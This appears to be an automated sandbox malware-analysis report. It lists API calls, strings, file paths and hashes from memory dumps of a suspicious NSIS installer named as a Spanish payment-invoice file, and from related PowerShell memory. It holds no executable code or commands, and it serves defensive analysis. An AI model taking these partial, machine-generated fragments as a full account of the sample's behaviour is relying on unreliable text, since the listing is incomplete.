                                                                              • Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd
                                                                              Similarity
                                                                              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                              • String ID:
                                                                              • API String ID: 1849352358-0
                                                                              • Opcode ID: df9cc67d31b04cd6e9f5647a99bb7b911e6a77bbf16d980a5e8a288dfb7b3bdc
                                                                              • Instruction ID: 718a49c372d49eeeb619100b459207f1cde729867d9d835a9e14b5832590348d
                                                                              • Opcode Fuzzy Hash: df9cc67d31b04cd6e9f5647a99bb7b911e6a77bbf16d980a5e8a288dfb7b3bdc
                                                                              • Instruction Fuzzy Hash: 74F0E7B2A04114AFEB01EBE4DE88DAFB7BDEB54305B10447AF602F6191C7749D018B79
                                                                              APIs
                                                                              • GetDC.USER32(?), ref: 00401D3B
                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D48
                                                                              • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D57
                                                                              • ReleaseDC.USER32(?,00000000), ref: 00401D68
                                                                              • CreateFontIndirectA.GDI32(0040A818), ref: 00401DB3
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd
                                                                              Similarity
                                                                              • API ID: CapsCreateDeviceFontIndirectRelease
                                                                              • String ID:
                                                                              • API String ID: 3808545654-0
                                                                              • Opcode ID: c2a9d05608db3b551cbe7321e8fd88224b197bc40f94a71f0fff53b7c1922a27
                                                                              • Instruction ID: ad7d238852a8d87b5aaa3e6a204337ae93e1cce4a0b470fbec170e72a625d374
                                                                              • Opcode Fuzzy Hash: c2a9d05608db3b551cbe7321e8fd88224b197bc40f94a71f0fff53b7c1922a27
                                                                              • Instruction Fuzzy Hash: EA01D632944340AFEB0177B0AE4EBAA3FB49759309F108479F201B62E2C6790052CF6F
                                                                              APIs
                                                                              • lstrlenA.KERNEL32(00429868,00429868,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404624,000000DF,00000000,00000400,?), ref: 004047A7
                                                                              • wsprintfA.USER32 ref: 004047AF
                                                                              • SetDlgItemTextA.USER32(?,00429868), ref: 004047C2
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd
                                                                              Similarity
                                                                              • API ID: ItemTextlstrlenwsprintf
                                                                              • String ID: %u.%u%s%s
                                                                              • API String ID: 3540041739-3551169577
                                                                              • Opcode ID: 1472cf9e36570b38fa99e832c46bb30f5d20a58f0764e004e3f2a6e79c89f0d0
                                                                              • Instruction ID: 053aaa49463ee093dad042f908cd6657d31450f6c5b0c7846562dfb37f065ee1
                                                                              • Opcode Fuzzy Hash: 1472cf9e36570b38fa99e832c46bb30f5d20a58f0764e004e3f2a6e79c89f0d0
                                                                              • Instruction Fuzzy Hash: 0E11E473A041283BDB0065A99C45EAF3288DB82374F254237FA25F71D1EA78CC1286A8
                                                                              APIs
                                                                              • SetWindowTextA.USER32(00000000,Blaggard Setup), ref: 00403A0C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd
                                                                              Similarity
                                                                              • API ID: TextWindow
                                                                              • String ID: "C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe"$1033$Blaggard Setup
                                                                              • API String ID: 530164218-2556252283
                                                                              • Opcode ID: c35f14d8ae607f964b1d366d12cd70842dee39e56cae11f13a59ba4c30930c7f
                                                                              • Instruction ID: fbf6035dbb292e76ee93bcdc762ea67a79fb5cde0254510f453a1e05a67cff09
                                                                              • Opcode Fuzzy Hash: c35f14d8ae607f964b1d366d12cd70842dee39e56cae11f13a59ba4c30930c7f
                                                                              • Instruction Fuzzy Hash: 97110871B046109BC730AF56DC409737B6CEF89319368423FE801A73D1D639AD03CAA9
                                                                              APIs
                                                                              • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004030FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 004057A7
                                                                              • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004030FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 004057B0
                                                                              • lstrcatA.KERNEL32(?,00409014), ref: 004057C1
                                                                              Strings
                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 004057A1
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd
                                                                              Similarity
                                                                              • API ID: CharPrevlstrcatlstrlen
                                                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                                                              • API String ID: 2659869361-3081826266
                                                                              • Opcode ID: 39623dee3265ed167cf4eb0d952b1efefe5673d98ca6e2622bb109ae9f6b3ea7
                                                                              • Instruction ID: 31daa9478c60f2ec517fa6cf0afa0cd81b34b06dfe81de980877f4a94ee531a8
                                                                              • Opcode Fuzzy Hash: 39623dee3265ed167cf4eb0d952b1efefe5673d98ca6e2622bb109ae9f6b3ea7
                                                                              • Instruction Fuzzy Hash: 8ED0A762505D306BE21226155C09D8B2A08CF12740B044027F100B61E1C63C4D414FFD
                                                                              APIs
                                                                              • DestroyWindow.USER32(00000000,00000000,00402DE2,00000001), ref: 00402C15
                                                                              • GetTickCount.KERNEL32 ref: 00402C33
                                                                              • CreateDialogParamA.USER32(0000006F,00000000,00402B7F,00000000), ref: 00402C50
                                                                              • ShowWindow.USER32(00000000,00000005), ref: 00402C5E
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd
                                                                              Similarity
                                                                              • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                              • String ID:
                                                                              • API String ID: 2102729457-0
                                                                              • Opcode ID: 42481ae060c013658952b0ba65f2133d3ed78682e8b262a627202bc2b689c50f
                                                                              • Instruction ID: 1b84634240e2166e3851fbc92cd381e461e1db94d3428fd6ef6110bf0b183a31
                                                                              • Opcode Fuzzy Hash: 42481ae060c013658952b0ba65f2133d3ed78682e8b262a627202bc2b689c50f
                                                                              • Instruction Fuzzy Hash: 97F05E30A09220EFD6317B20FE4CD9F7BA4BB04B15B404976F104B11EAC7782882CB9D
                                                                              APIs
                                                                                • Part of subcall function 00405D2F: lstrcpynA.KERNEL32(?,?,00000400,004031BD,Blaggard Setup,NSIS Error), ref: 00405D3C
                                                                                • Part of subcall function 0040583A: CharNextA.USER32(?,?,0042AC70,?,004058A6,0042AC70,0042AC70,74DF3410,?,C:\Users\user\AppData\Local\Temp\,004055F1,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405848
                                                                                • Part of subcall function 0040583A: CharNextA.USER32(00000000), ref: 0040584D
                                                                                • Part of subcall function 0040583A: CharNextA.USER32(00000000), ref: 00405861
                                                                              • lstrlenA.KERNEL32(0042AC70,00000000,0042AC70,0042AC70,74DF3410,?,C:\Users\user\AppData\Local\Temp\,004055F1,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058E2
                                                                              • GetFileAttributesA.KERNEL32(0042AC70,0042AC70,0042AC70,0042AC70,0042AC70,0042AC70,00000000,0042AC70,0042AC70,74DF3410,?,C:\Users\user\AppData\Local\Temp\,004055F1,?,74DF3410,C:\Users\user\AppData\Local\Temp\), ref: 004058F2
                                                                              Strings
                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 0040588F
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd
                                                                              Similarity
                                                                              • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                                                              • API String ID: 3248276644-3081826266
                                                                              • Opcode ID: db8bdf16e861f9482455b6e3180b19c0ec0d0437e7b2793ecf43ff70ccde9147
                                                                              • Instruction ID: 9b9a112432e638448ae222c580828ae1e9a3246b43ea9c19d715dfb55d3aa95b
                                                                              • Opcode Fuzzy Hash: db8bdf16e861f9482455b6e3180b19c0ec0d0437e7b2793ecf43ff70ccde9147
                                                                              • Instruction Fuzzy Hash: 1CF0F427105D6156E622323A5C49A9F1A54CE86324718C53BFC50B22C2CA3C88639D7E
                                                                              APIs
                                                                              • FreeLibrary.KERNEL32(?,74DF3410,00000000,C:\Users\user\AppData\Local\Temp\,004035F2,0040340C,?), ref: 00403634
                                                                              • GlobalFree.KERNEL32(00000000), ref: 0040363B
                                                                              Strings
                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 0040361A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd
                                                                              Similarity
                                                                              • API ID: Free$GlobalLibrary
                                                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                                                              • API String ID: 1100898210-3081826266
                                                                              • Opcode ID: dccbf9c36de3459267eb1af99735bed06c7a158201479be104942c1c24015bd8
                                                                              • Instruction ID: 1a9bfca33d817e772708c534a1c0ef1eeb9da564593c1c7aee7843147688a1a4
                                                                              • Opcode Fuzzy Hash: dccbf9c36de3459267eb1af99735bed06c7a158201479be104942c1c24015bd8
                                                                              • Instruction Fuzzy Hash: 60E08C329050606BC6316F15ED04B2E76A9AB48B22F42006AEA407B3A08B756C424BCC
                                                                              APIs
                                                                              • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402CD2,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe,C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe,80000000,00000003), ref: 004057EE
                                                                              • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402CD2,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe,C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe,80000000,00000003), ref: 004057FC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd
                                                                              Similarity
                                                                              • API ID: CharPrevlstrlen
                                                                              • String ID: C:\Users\user\Desktop
                                                                              • API String ID: 2709904686-224404859
                                                                              • Opcode ID: cad1fee570528055bb4f840757e41c2b2d093a40416f1971c342fc3ba500c074
                                                                              • Instruction ID: 563d0c8124584ba78a4db43b9ec919a88ee2b9567cf051c7da1bb821b6b33a35
                                                                              • Opcode Fuzzy Hash: cad1fee570528055bb4f840757e41c2b2d093a40416f1971c342fc3ba500c074
                                                                              • Instruction Fuzzy Hash: 48D0A773808D705FF34362109C04B8F6B48CF12740F094062E140A71D0C2780C414BBD
                                                                              APIs
                                                                              • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B64,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405917
                                                                              • lstrcmpiA.KERNEL32(00000000,00000000), ref: 0040592F
                                                                              • CharNextA.USER32(00000000,?,00000000,00405B64,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405940
                                                                              • lstrlenA.KERNEL32(00000000,?,00000000,00405B64,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405949
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd
                                                                              Similarity
                                                                              • API ID: lstrlen$CharNextlstrcmpi
                                                                              • String ID:
                                                                              • API String ID: 190613189-0
                                                                              • Opcode ID: d250403eeccc32afa1460bd507a63d74f6ad2c43926490d4129708a4008c1f50
                                                                              • Instruction ID: 9438e9cad6691fea7f13f8d56426e11099e03f26c07faecbb185dc05f13043cf
                                                                              • Opcode Fuzzy Hash: d250403eeccc32afa1460bd507a63d74f6ad2c43926490d4129708a4008c1f50
                                                                              • Instruction Fuzzy Hash: D5F06236505518FFCB129FA5DC00D9EBBA8EF16360B2540B9F800F7350D674EE01ABA9
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1871719670.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_7a30000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$tP^q$tP^q
                                                                              • API String ID: 0-306622666
                                                                              • Opcode ID: 259db7fad69ee2bcc555e458a3b75f99118cf496245e090cb38e8e21a9a18027
                                                                              • Instruction ID: 19318a230e5ec411fca442ee46c827d92a5dcbac283c241d96712acc377887e9
                                                                              • Opcode Fuzzy Hash: 259db7fad69ee2bcc555e458a3b75f99118cf496245e090cb38e8e21a9a18027
                                                                              • Instruction Fuzzy Hash: A2B2BEB0B04309DFDB14CFA8C885BAABBF2AB89304F108469E9159F755CB76DC45CB91
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1875215771.0000000009450000.00000040.00000800.00020000.00000000.sdmp, Offset: 09450000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_9450000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'^q$4'^q$4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                              • API String ID: 0-1262107880
                                                                              • Opcode ID: 38e392125014be5ea4664604b730167a6db6f4ed844956574560b77a615b7784
                                                                              • Instruction ID: 646b08463560926763ce3352bccdbfe19efad41a6c04ec7b3ddcb542a36339b9
                                                                              • Opcode Fuzzy Hash: 38e392125014be5ea4664604b730167a6db6f4ed844956574560b77a615b7784
                                                                              • Instruction Fuzzy Hash: 4132CB75B04208DFC714CFA8C455AAABBE2AF85314F14846BEC0A9F756DB32DC45CBA1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1871719670.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_7a30000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'^q$4'^q$$^q$$^q$$^q
                                                                              • API String ID: 0-3272787073
                                                                              • Opcode ID: d5b19044797b0f3d2ef4d8f958d0113c333834294f04026bf1d209e88181f21f
                                                                              • Instruction ID: 975ebc10e5b8802fba16af83ba3205bc518f25092bcec08e27bf1840df669808
                                                                              • Opcode Fuzzy Hash: d5b19044797b0f3d2ef4d8f958d0113c333834294f04026bf1d209e88181f21f
                                                                              • Instruction Fuzzy Hash: 997137B1F002098FCB149F7998002ABBBE7EFC5611F14847AE869DB255DB31D945C7E1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1871719670.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_7a30000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'^q$4'^q$$^q$$^q
                                                                              • API String ID: 0-2049395529
                                                                              • Opcode ID: 83b10a51207555d1983419ce1eb6d95b5d97c36bf3c51321b4c9e4287dc65348
                                                                              • Instruction ID: b03994469ac1a52e36fcfcf4b6bda7b54ad3202bdbb4c56a7704e4069d5a54f7
                                                                              • Opcode Fuzzy Hash: 83b10a51207555d1983419ce1eb6d95b5d97c36bf3c51321b4c9e4287dc65348
                                                                              • Instruction Fuzzy Hash: 65528DB4A002199FDB14CF58C881FA9BBB2FB89304F50C495E919AF755CB32ED858F91
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1871719670.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_7a30000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'^q$4'^q$4'^q$4'^q
                                                                              • API String ID: 0-1420252700
                                                                              • Opcode ID: d5348e1f320d5ace84c5c5c61641f291b3a393a999b56d66b253960231a49564
                                                                              • Instruction ID: ea590f4c0d22ced98e608b2c171a5d2c61dc37b8bf69a40425332b06462cddb4
                                                                              • Opcode Fuzzy Hash: d5348e1f320d5ace84c5c5c61641f291b3a393a999b56d66b253960231a49564
